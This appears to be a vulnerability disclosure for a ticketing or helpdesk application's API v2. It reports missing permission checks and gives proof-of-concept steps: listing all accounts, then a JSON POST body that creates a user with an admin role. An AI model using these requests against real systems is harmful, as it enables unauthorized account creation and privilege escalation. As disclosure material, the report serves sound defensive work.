Improper Privilege Management API V2
Discription

# Description
There are some `api v2` doesn’t check permission allow attackers to retrieve/edit information `ticket`,`account`,`group`,`department`,`team`,`ElasticSearch`

# Proof of Concept
*Get users list*
“`
1. Login.
2. Go to `/api/v2/accounts?type=all`.
3. Users list return.
“`
![alt text](https://i.ibb.co/r07DTYf/get-accounts.png)

*Create user with admin role*
“`
1. Get the admin role id in `/api/v2/accounts`.
2. Send POST to `/api/v2/accounts`.
“`
“`
{“username”:”test21233″,”fullname”:”test21233″,”title”:”test2″,”email”:”[email protected]”,”teams”:[“627ce1fd9f59377095600ce9″],”role”:”627ce1fd9f59377095600ce1″,”password”:”test2test2″,”passwordConfirm”:”test2test2″}
“`
3. Create successfully.
![alt text](https://i.ibb.co/8DfcL0D/create-account.png)
# Note
Many api endpoint get vulnerable, i just show piece of attack vector that can happen.

Back to Main

Subscribe for the latest news: